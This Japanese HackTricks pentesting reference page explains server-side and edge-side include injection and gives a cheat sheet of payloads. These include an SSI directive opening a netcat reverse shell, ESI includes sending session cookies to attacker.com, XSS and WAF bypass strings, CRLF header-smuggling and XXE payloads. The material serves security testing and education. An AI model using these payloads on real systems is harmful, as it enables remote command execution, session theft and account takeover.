hacktricks/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md

# サーバーサイドインクルージョン/エッジサイドインクルージョンインジェクション

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* **サイバーセキュリティ企業**で働いていますか？ **HackTricksで会社を宣伝**したいですか？または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか？[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください！
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式のPEASS＆HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **ハッキングのトリックを共有するには、PRを** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **と** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **に提出してください。**

</details>

## サーバーサイドインクルージョンの基本情報

SSI（サーバーサイドインクルード）は、HTMLページに配置され、ページが提供される際にサーバーで評価される指示です。これにより、CGIプログラムや他の動的な技術を介してページ全体を提供する必要なく、既存のHTMLページに**動的に生成されたコンテンツを追加**することができます。\
たとえば、次のように既存のHTMLページにディレクティブを配置することができます。

`<!--#echo var="DATE_LOCAL" -->`

そして、ページが提供されると、このフラグメントは評価され、その値で置き換えられます。

`Tuesday, 15-Jan-2013 19:28:54 EST`

SSIを使用するタイミングと、ページ全体をプログラムによって生成するタイミングは、通常、ページのどれだけが静的であり、ページが提供されるたびに再計算する必要があるかによって決まります。SSIは、上記のように現在の時刻などの小さな情報を追加するための素晴らしい方法です。しかし、ページの大部分が提供される時点で生成される場合は、他の解決策を探す必要があります。（定義は[ここ](https://httpd.apache.org/docs/current/howto/ssi.html)から取得されました）。

ウェブアプリケーションが拡張子`.shtml`、`.shtm`、または`.stm`のファイルを使用している場合、SSIの存在を推測することができますが、これに限定されません。

典型的なSSI式の形式は次のようになります：
```
<!--#directive param="value" -->
```
### チェック

To check for Server-Side Inclusion (SSI) and Edge-Side Inclusion (ESI) Injection vulnerabilities, you can follow these steps:

1. **Identify user-controllable input**: Look for any user input that is directly or indirectly used in the server-side code or templates. This can include parameters in URLs, form inputs, cookies, or HTTP headers.

2. **Inject SSI/ESI payloads**: Once you have identified the user-controllable input, inject SSI or ESI payloads to test for vulnerabilities. For SSI, you can use the `<!--#include virtual="file" -->` directive to include a file. For ESI, you can use the `<esi:include src="url" />` tag to include a URL.

3. **Observe the response**: Check if the injected payload is executed and if any server-side code or template files are included in the response. Look for any unexpected content or error messages that may indicate a successful inclusion.

4. **Exploit the vulnerability**: If the payload is successfully executed and includes server-side code or template files, try to exploit the vulnerability further. This can include accessing sensitive files, executing arbitrary code, or escalating privileges.

5. **Mitigate the vulnerability**: Once the vulnerability is confirmed, it is important to mitigate it to prevent potential attacks. This can involve sanitizing user input, implementing proper input validation, and using secure coding practices.

By following these steps, you can effectively check for SSI and ESI Injection vulnerabilities and take appropriate actions to secure your web application.
```javascript
// Document name
<!--#echo var="DOCUMENT_NAME" -->
// Date
<!--#echo var="DATE_LOCAL" -->

// File inclusion
<!--#include virtual="/index.html" -->
// Including files (same directory)
<!--#include file="file_to_include.html" -->
// CGI Program results
<!--#include virtual="/cgi-bin/counter.pl" -->
// Including virtual files (same directory)
<!--#include virtual="file_to_include.html" -->
// Modification date of a file
<!--#flastmod file="index.html" -->

// Command exec
<!--#exec cmd="dir" -->
// Command exec
<!--#exec cmd="ls" -->
// Reverse shell
<!--#exec cmd="mkfifo /tmp/foo;nc <PENTESTER IP> <PORT> 0</tmp/foo|/bin/bash 1>/tmp/foo;rm /tmp/foo" -->

// Print all variables
<!--#printenv -->
// Setting variables
<!--#set var="name" value="Rich" -->

```
## エッジサイドインクルージョン

コンテンツの一部が次回の取得時に変化する可能性があるため、**情報のキャッシュや動的なアプリケーション**に問題があります。これがESIが使用される理由で、ESIタグを使用して**キャッシュバージョンを送信する前に生成する必要がある動的コンテンツ**を示します。\
もし**攻撃者**がキャッシュコンテンツ内に**ESIタグを注入**できる場合、ユーザーに送信される前にドキュメントに**任意のコンテンツを注入**することができます。

### ESIの検出

以下の**ヘッダー**がサーバーからのレスポンスに含まれている場合、サーバーはESIを使用しています。
```
Surrogate-Control: content="ESI/1.0"
```
このヘッダーが見つからない場合、サーバーは**ESIを使用している可能性があります**。\
**盲目的な攻撃手法も使用できます**。攻撃者のサーバーにリクエストが到着するはずです。
```javascript
// Basic detection
hell<!--esi-->o
// If previous is reflected as "hello", it's vulnerable

// Blind detection
<esi:include src=http://attacker.com>

// XSS Exploitation Example
<esi:include src=http://attacker.com/XSSPAYLOAD.html>

// Cookie Stealer (bypass httpOnly flag)
<esi:include src=http://attacker.com/?cookie_stealer.php?=$(HTTP_COOKIE)>

// Introduce private local files (Not LFI per se)
<esi:include src="supersecret.txt">

// Valid for Akamai, sends debug information in the response
<esi:debug/>
```
### ESIの悪用

[GoSecure](https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/)は、異なるESI対応ソフトウェアに対して試すことができる攻撃の可能性を理解するためのテーブルを作成しました。以下のテーブルの列名に関して、いくつかの説明を提供します：

* **Includes**: `<esi:includes>`ディレクティブをサポートしています
* **Vars**: `<esi:vars>`ディレクティブをサポートしています。XSSフィルタをバイパスするのに役立ちます
* **Cookie**: ドキュメントのクッキーはESIエンジンからアクセス可能です
* **Upstream Headers Required**: 上流アプリケーションがヘッダを提供しない限り、サロゲートアプリケーションはESIステートメントを処理しません
* **Host Allowlist**: この場合、ESIインクルードは許可されたサーバーホストからのみ可能であり、例えばSSRFはそれらのホストに対してのみ可能です

|         **ソフトウェア**         | **Includes** | **Vars** | **Cookies** | **Upstream Headers Required** | **Host Whitelist** |
| :--------------------------: | :----------: | :------: | :---------: | :---------------------------: | :----------------: |
|            Squid3            |      Yes     |    Yes   |     Yes     |              Yes              |         No         |
|         Varnish Cache        |      Yes     |    No    |      No     |              Yes              |         Yes        |
|            Fastly            |      Yes     |    No    |      No     |               No              |         Yes        |
| Akamai ESI Test Server (ETS) |      Yes     |    Yes   |     Yes     |               No              |         No         |
|          NodeJS esi          |      Yes     |    Yes   |     Yes     |               No              |         No         |
|         NodeJS nodesi        |      Yes     |    No    |      No     |               No              |      Optional      |

#### XSS

以下のESIディレクティブは、サーバーのレスポンス内に任意のファイルをロードします。
```markup
<esi:include src=http://attacker.com/xss.html>
```
ファイル_http://attacker.com/xss.html_には、`<script>alert(1)</script>`のようなXSSペイロードが含まれている可能性があります。

#### クライアントのXSS保護をバイパスする
```markup
x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>

Use <!--esi--> to bypass WAFs:
<scr<!--esi-->ipt>aler<!--esi-->t(1)</sc<!--esi-->ript>
<img+src=x+on<!--esi-->error=ale<!--esi-->rt(1)>
```
#### Cookieの盗み出し

* リモートでCookieを盗み出す
```markup
<esi:include src=http://attacker.com/$(HTTP_COOKIE)>
<esi:include src="http://attacker.com/?cookie=$(HTTP_COOKIE{'JSESSIONID'})" />
```
* レスポンスに反映させることで、XSSを使用してHTTP\_ONLYクッキーを盗む：
```bash
# This will reflect the cookies in the response
<!--esi $(HTTP_COOKIE) -->
# Reflect XSS
<!--esi/$url_decode('"><svg/onload=prompt(1)>')/-->
```
<figure><img src="../.gitbook/assets/image (4) (7).png" alt=""><figcaption></figcaption></figure>

* クッキーの反映による完全なアカウント乗っ取り

<figure><img src="../.gitbook/assets/image (21).png" alt=""><figcaption></figcaption></figure>

#### プライベートなローカルファイル

これは「ローカルファイルインクルージョン」とは混同しないでください。
```markup
<esi:include src="secret.txt">
```
#### CRLF

CRLF（Carriage Return Line Feed）は、テキストファイル内の改行を表す特殊な文字シーケンスです。CR（キャリッジリターン）はカーソルを行の先頭に移動させ、LF（ラインフィード）はカーソルを次の行に移動させます。

CRLFインジェクションは、Webアプリケーションにおいて、ユーザーの入力が直接レスポンスヘッダーに挿入される場合に発生する脆弱性です。攻撃者は、改行文字を使用してヘッダーを改ざんし、任意のヘッダーやレスポンスを挿入することができます。

CRLFインジェクションの影響は、セッションハイジャック、クロスサイトスクリプティング（XSS）、クロスサイトリクエストフォージェリ（CSRF）など、さまざまな攻撃につながる可能性があります。

CRLFインジェクションを防ぐためには、ユーザーの入力を適切にエスケープするか、改行文字を削除する必要があります。また、セキュリティヘッダーの適切な設定や、最新のパッチやアップデートの適用も重要です。
```markup
<esi:include src="http://anything.com%0d%0aX-Forwarded-For:%20127.0.0.1%0d%0aJunkHeader:%20JunkValue/"/>
```
#### オープンリダイレクト

以下は、レスポンスに `Location` ヘッダーを追加します。
```bash
<!--esi $add_header('Location','http://attacker.com') -->
```
#### ヘッダーの追加

* 強制リクエストでヘッダーを追加する
```html
<esi:include src="http://example.com/asdasd">
<esi:request_header name="User-Agent" value="12345"/>
</esi:include>
```
* レスポンスにヘッダーを追加します（XSSを含むレスポンスで「Content-Type: text/json」をバイパスするのに便利です）
```bash
<!--esi/$add_header('Content-Type','text/html')/-->

<!--esi/$(HTTP_COOKIE)/$add_header('Content-Type','text/html')/$url_decode($url_decode('"><svg/onload=prompt(1)>'))/-->
```
<figure><img src="../.gitbook/assets/image (5) (1) (1) (2).png" alt=""><figcaption></figcaption></figure>

#### ヘッダーにCRLFを追加する（**CVE-2019-2438)**
```markup
<esi:include src="http://example.com/asdasd">
<esi:request_header name="User-Agent" value="12345
Host: anotherhost.com"/>
</esi:include>
```
#### Akamai デバッグ

これにより、レスポンスに含まれるデバッグ情報が送信されます：
```markup
<esi:debug/>
```
### ESI + XSLT = XXE

`xslt`値を_dca_パラメータに指定することで、**eXtensible Stylesheet Language Transformations (XSLT)**ベースのESIインクルードを追加することも可能です。次のインクルードは、HTTPサロゲートにXMLファイルとXSLTファイルのリクエストを行わせます。その後、XSLTファイルがXMLファイルをフィルタリングするために使用されます。このXMLファイルを使用して、**XML External Entity (XXE)**攻撃を実行することができます。これにより、攻撃者は**Server-Side Request Forgery (SSRF)**攻撃を実行することができますが、ESIインクルード自体がSSRFベクトルであるため、あまり有用ではありません。外部DTDは解析されません。なぜなら、基礎となるライブラリ（Xalan）がそれをサポートしていないためです。ローカルファイルを抽出することはできません。
```markup
<esi:include src="http://host/poc.xml" dca="xslt" stylesheet="http://host/poc.xsl" />
```
XSLTファイル：
```markup
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE xxe [<!ENTITY xxe SYSTEM "http://evil.com/file" >]>
<foo>&xxe;</foo>
```
XSLTページをチェックしてください：

{% content-ref url="xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md" %}
[xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md](xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md)
{% endcontent-ref %}

### 参考文献

* [https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/](https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/)
* [https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/](https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/)
* [https://academy.hackthebox.com/module/145/section/1304](https://academy.hackthebox.com/module/145/section/1304)
* [https://infosecwriteups.com/exploring-the-world-of-esi-injection-b86234e66f91](https://infosecwriteups.com/exploring-the-world-of-esi-injection-b86234e66f91)

## ブルートフォース検出リスト

{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssi_esi.txt" %}

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* **サイバーセキュリティ企業で働いていますか？** **HackTricksで会社を宣伝**したいですか？または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか？[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください！
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう、私たちの独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクション
* [**公式のPEASS＆HackTricks swag**](https://peass.creator-spring.com)を手に入れましょう
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**をフォロー**してください。
* **ハッキングのトリックを共有するには、PRを** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **と** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **に提出**してください。

</details>